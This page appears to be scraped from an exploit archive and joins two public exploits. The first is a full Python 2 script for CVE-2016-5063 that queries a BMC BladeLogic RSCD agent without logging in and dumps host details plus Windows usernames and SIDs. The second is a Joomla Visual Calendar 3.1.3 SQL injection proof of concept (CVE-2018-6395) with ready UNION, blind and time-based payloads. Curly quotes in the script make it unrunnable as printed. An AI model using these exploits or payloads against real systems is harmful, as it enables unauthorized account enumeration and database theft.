# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Version: BMC RSCD agent 8.3.00.64
# CVE: CVE-2016-5063
# Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-windows-rscd-agent-vulnerability-in-bmc-server-automation-cve-2016-5063
# Tested on: 8.3.00.64

#!/usr/bin/python2

# Retrieving Windows system users with BMC BladeLogic RSCD agent
# Tested against v8.3.00.64 (Windows version)
# CVE-2016-5063

# Author: Paul Taylor / Foregenix Ltd
# github.com/bao7uo/bmc_bladelogic
# www.foregenix.com/blog

# Credits:
# Converted to work against Windows version
# from the Linux BMC getUsers exploit by ERNW

import socket
import ssl
import sys
import requests
import argparse
import xml.etree.ElementTree as ET
import xml.dom.minidom
import httplib
from requests.packages.urllib3 import PoolManager
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3.connectionpool import HTTPConnectionPool
from requests.adapters import HTTPAdapter

class MyHTTPConnection(HTTPConnection):
def __init__(self, unix_socket_url, timeout=60):
HTTPConnection.__init__(self, HOST, timeout=timeout)
self.unix_socket_url = unix_socket_url
self.timeout = timeout

def connect(self):
self.sock = wrappedSocket

class MyHTTPConnectionPool(HTTPConnectionPool):
def __init__(self, socket_path, timeout=60):
HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
self.socket_path = socket_path
self.timeout = timeout

def _new_conn(self):
return MyHTTPConnection(self.socket_path, self.timeout)

class MyAdapter(HTTPAdapter):
def __init__(self, timeout=60):
super(MyAdapter, self).__init__()
self.timeout = timeout

def get_connection(self, socket_path, proxies=None):
return MyHTTPConnectionPool(socket_path, self.timeout)

def request_url(self, request, proxies):
return request.path_url

def optParser():
parser = argparse.ArgumentParser(description=”Retrieving system users with BMC BladeLogic Server Automation RSCD agent”)
parser.add_argument(“host”, help=”IP address of a target system”)
parser.add_argument(“-p”, “–port”, type=int, default=4750, help=”TCP port (default: 4750)”)
opts = parser.parse_args()
return opts

init = “””<?xml version=”1.0″ encoding=”UTF-8″?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2015-11-19-16-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value>8.6.01.66</value></param></params></methodCall>”””
getVersion = “””<?xml version=”1.0″ encoding=”UTF-8″?><methodCall><methodName>RemoteServer.getVersion</methodName><params/></methodCall>”””
getWindowsUsers = “””<?xml version=”1.0″ encoding=”UTF-8″?><methodCall><methodName>RemoteUser.getUserContents</methodName><params><param><value><struct><member><name>typeName</name><value>OS</value></member><member><name>host</name><value>0.0.0.0</value></member><member><name>container</name><value><array><data><value><struct><member><name>string</name><value></value></member><member><name>value</name><value><struct><member><name>longValue</name><value><ex:i8>1</ex:i8></value></member><member><name>kind</name><value><i4>1</i4></value></member></struct></value></member></struct></value></data></array></value></member><member><name>path</name><value>/</value></member></struct></value></param><param><value><i4>1</i4></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param><param><value><array><data/></array></value></param></params></methodCall>”””
getHostOverview = “””<?xml version=”1.0″ encoding=”UTF-8″?><methodCall><methodName>RemoteServer.getHostOverview</methodName></methodCall>”””

options = optParser()
PORT = options.port
HOST = options.host

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))

sock.sendall(“TLSRPC”)

wrappedSocket = ssl.wrap_socket(sock)

adapter = MyAdapter()
s = requests.session()
s.mount(“http://”, adapter)

print “Sending intro…”
r = s.post(‘http://’+HOST+’:’+str(PORT)+’/xmlrpc’, data=init)

print “Getting version…”
r = s.post(‘http://’+HOST+’:’+str(PORT)+’/xmlrpc’, data=getVersion)

rootVersion = ET.fromstring(r.content)
print “=========================”
print “Major version : ” + rootVersion[0][0][0][0][0][1].text
print “Minor version : ” + rootVersion[0][0][0][0][1][1].text
print “Patch version : ” + rootVersion[0][0][0][0][2][1].text
print “Platform version: ” + rootVersion[0][0][0][0][3][1].text
print “=========================\n”

print “Getting host overview…”
r = s.post(‘http://’+HOST+’:’+str(PORT)+’/xmlrpc’, data=getHostOverview)

rootOverview = ET.fromstring(r.content)
print rootOverview[0][0][0][0][12][1].text

linux = False

if rootOverview[0][0][0][0][0][1].text is not None:
linux = True

print “==================================================”
print “Agent instal dir: ” + rootOverview[0][0][0][0][1][1].text
print “Licensed? : ” + (“false” if (int(rootOverview[0][0][0][0][2][1][0].text) == 0) else “true”)
print “Repeater? : ” + (“false” if (int(rootOverview[0][0][0][0][12][1][0].text) == 0) else “true”)
print “Hostname : ” + rootOverview[0][0][0][0][6][1].text
print “Netmask : ” + rootOverview[0][0][0][0][13][1].text
print “CPU architecture: ” + rootOverview[0][0][0][0][10][1].text
print “Platform (OS) : ” + rootOverview[0][0][0][0][14][1].text
print “OS version : ” + rootOverview[0][0][0][0][15][1].text
print “OS architecture : ” + rootOverview[0][0][0][0][3][1].text
print “OS release : ” + rootOverview[0][0][0][0][11][1].text
print “Patch level : ” + rootOverview[0][0][0][0][7][1].text
print “==================================================\n”

print “Sending request for users…\n”

r = s.post(‘http://’+HOST+’:’+str(PORT)+’/xmlrpc’, data=getWindowsUsers)

with open(“./users.xml”, “w”) as text_file:
text_file.write(r.content)

root = ET.parse(‘./users.xml’).getroot()
count = 0
ind = 1
while ind:
try:
ind = root[0][0][0][0][0][count][0][14][1].text
except IndexError:
pass
break
count += 1

print “Number of users found: ” + str(count) + “\n”
for i in range(0, count):
print “Username: “+ root[0][0][0][0][0][i][0][14][1].text
print “SID: ” + root[0][0][0][0][0][i][0][12][1].text
print “Comment: ” + root[0][0][0][0][0][i][0][2][1].text

print “……………………\n”

wrappedSocket.close()

Joomla! Visual Calendar 3.1.3 SQL Injection

# # # # #
# Exploit Title: Joomla! Component Visual Calendar 3.1.3 - SQL Injection
# Dork: N/A
# Date: 30.01.2018
# Vendor Homepage: http://www.joomlacalendars.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/visual-calendar/
# Version: 3.1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6395
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_visualcalendar&view=load&id=[SQL]
#
# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%20(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:[email protected]%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x32%2c0x33%2c0x34%2c0x35%2c0x36%2d%2d%20%2d
#
# -1%20%20/*!06666UNION*/%20/*!06666SELECT*/%201%2c0x32%2c(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:[email protected]%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)%2c0x34%2c0x35%2c0x36%2d%2d%20%2d
#
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND 2616=2616
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 6 columns
# Payload: r=0.31729071866720915&option=com_visualcalendar&view=load&id=1 UNION ALL SELECT CONCAT(0x716a627a71,0x586a6c7676787a6f684c73745863744b7955784a47534d58797158564a53716d6b57434f6141536c,0x71786b6a71),NULL,NULL,NULL,NULL,NULL-- QpYd
#
# # # # #